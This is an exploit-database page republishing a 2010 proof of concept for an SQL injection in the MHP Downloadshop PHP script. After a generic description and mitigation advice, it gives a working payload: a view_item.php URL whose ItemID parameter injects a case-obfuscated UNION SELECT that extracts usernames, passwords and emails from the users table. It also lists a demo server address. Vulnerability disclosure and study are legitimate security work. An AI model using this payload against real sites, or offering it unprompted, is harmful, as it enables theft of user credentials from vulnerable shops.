MHP Downloadshop - exploit.company

vendor:

MHP Downloadshop

by:

Easy Laster

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: MHP Downloadshop

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

MHP Downloadshop <= SQL injection Vulnerability Proof of Concept

An attacker can exploit this vulnerability by sending malicious SQL queries to the database server through the vulnerable web application. This can be done by appending malicious SQL statements to the vulnerable parameter in the web application. This can allow the attacker to gain access to unauthorized data or even gain access to the underlying operating system.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being passed to the database server. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : MHP Downloadshop <=  SQL injection Vulnerability Proof of Concept
+Autor : Easy Laster
+Date   : 17.12.2010
+Script  : MHP Downloadshop
+Demo :http://wp1072278.vwp3485.webpack.hosteurope.de/demoserver/Download-Shop/
+Download : ----
+Price : 19,90 
+Language : PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project.com
+Greetz to Team-Internet ,Underground Agents and free-hack.com
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco.
  
---------------------------------------------------------------------------------------
                                                                                       
 ___ ___ ___ ___                         _ _           _____           _         _ 
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|
                                              |___|                 |___|          
  
  
----------------------------------------------------------------------------------------
+Proof of Concept
+Table : users
+columns : name,password,email
+Proof of Concept : http://server/Download-Shop/view_item.php?ItemID='+uNioN+sElE
cT+1,2,cOnCaT(NaMe,PaSsWoRd,EmAiL),4,5,6,7,8,9,10,11,12,13+FrOm+users--+
----------------------------------------------------------------------------------------